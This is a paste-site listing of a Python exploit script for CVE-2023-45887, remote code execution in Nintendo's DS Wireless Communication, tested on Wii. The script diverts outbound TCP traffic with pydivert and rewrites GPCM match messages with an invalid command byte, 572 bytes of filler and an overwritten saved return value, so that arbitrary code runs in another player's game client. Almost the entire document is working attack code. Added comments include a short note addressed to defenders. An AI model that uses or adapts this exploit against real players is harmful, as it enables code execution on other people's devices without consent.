FlyFar

DS Wireless Communication Remote Code Execution - CVE-2023-45887

Feb 16th, 2024
Python 1.91 KB | Cybersecurity | 0 0
  1. # Exploit Title: DS Wireless Communication Remote Code Execution
  2. # Date: 11 Oct 2023
  3. # Exploit Author: MikeIsAStar
  4. # Vendor Homepage: https://www.nintendo.com
  5. # Version: Unknown
  6. # Tested on: Wii
  7. # CVE: CVE-2023-45887
  8.  
  9. """This code will inject arbitrary code into a client's game.
  10.  
  11. You are fully responsible for all activity that occurs while using this code.
  12. The author of this code can not be held liable to you or to anyone else as a
  13. result of damages caused by the usage of this code.
  14. """
  15.  
  16. import re
  17. import sys
  18.  
  19. try:
  20.     import pydivert
  21. except ModuleNotFoundError:
  22.     sys.exit("The 'pydivert' module is not installed !")
  23.  
  24.  
  # Values the author marks as adjustable.
  # LR_SAVE is the four-byte value written directly after the filler; the name
  # suggests a saved link-register slot on the target (TODO confirm against the
  # advisory). 0x41414141 is a recognisable placeholder pattern.
  LR_SAVE = b'\x41\x41\x41\x41'
  # PADDING is the repeating filler pattern; it must be non-empty because its
  # length is used as a divisor when the filler is built.
  PADDING = b'MikeStar'
  assert len(LR_SAVE) == 4
  assert len(PADDING) != 0

  # Fixed values describing the message layout and the capture filter.
  # Number of filler bytes placed between the command byte and LR_SAVE
  # (0x23C == 572).
  PADDING_LENGTH = 0x23C
  # Single command byte appended right after the matched message header.
  DWC_MATCH_COMMAND_INVALID = b'\xFE'
  # Key that terminates the rewritten message.
  FINAL_KEY = b'\\final\\'
  # WinDivert filter: only outbound TCP packets that carry a payload.
  WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'
  36.  
  37.  
  def try_modify_payload(payload):
      """Return a rewritten GPCM match message, or None if none is present.

      The payload is searched for a ``\\msg\\GPCM<n>vMAT`` header, where <n> is
      a one- or two-digit number without a leading zero (the captured number
      itself is not used). Everything after the header is discarded and
      replaced by, in order: the DWC_MATCH_COMMAND_INVALID byte,
      PADDING_LENGTH bytes of repeated PADDING, the four-byte LR_SAVE value,
      and the ``\\final\\`` key.

      Review note for defenders: the distinguishing feature of the rewritten
      message is a body of PADDING_LENGTH + 4 bytes between the command byte
      and ``\\final\\``. The listing's header ties this to CVE-2023-45887; the
      remedy belongs in the receiving client, which has to bound the message
      body before copying it (presumably into a fixed-size buffer - TODO
      confirm against the advisory).
      """
      header = re.search(rb'\\msg\\GPCM([1-9][0-9]?)vMAT', payload)
      if header is None:
          return None

      # Repeat the pattern one time more than strictly needed, then cut the
      # result to exactly PADDING_LENGTH bytes.
      repeats = PADDING_LENGTH // len(PADDING) + 1
      filler = (PADDING * repeats)[:PADDING_LENGTH]

      kept = payload[:header.end()]
      return kept + DWC_MATCH_COMMAND_INVALID + filler + LR_SAVE + FINAL_KEY
  50.  
  51.  
  def main():
      """Pass local outbound TCP traffic through try_modify_payload.

      Opens a WinDivert handle with WINDIVERT_FILTER, so only outbound TCP
      packets with a non-empty payload on this machine are diverted. Every
      diverted packet is sent on again; a packet whose payload contains a GPCM
      match message is sent with the rewritten payload instead.

      Ctrl+C ends the loop quietly. A PermissionError ends the process with a
      message saying administrator privileges are required.
      """
      try:
          with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:
              for packet in packet_buffer:
                  replacement = try_modify_payload(packet.payload)
                  if replacement is None:
                      # Not a match message: forward the packet unchanged.
                      packet_buffer.send(packet)
                      continue
                  print('Modified a GPCM message !')
                  packet.payload = replacement
                  packet_buffer.send(packet)
      except PermissionError:
          sys.exit('This program must be run with administrator privileges !')
      except KeyboardInterrupt:
          return


  if __name__ == '__main__':
      main()
  69.        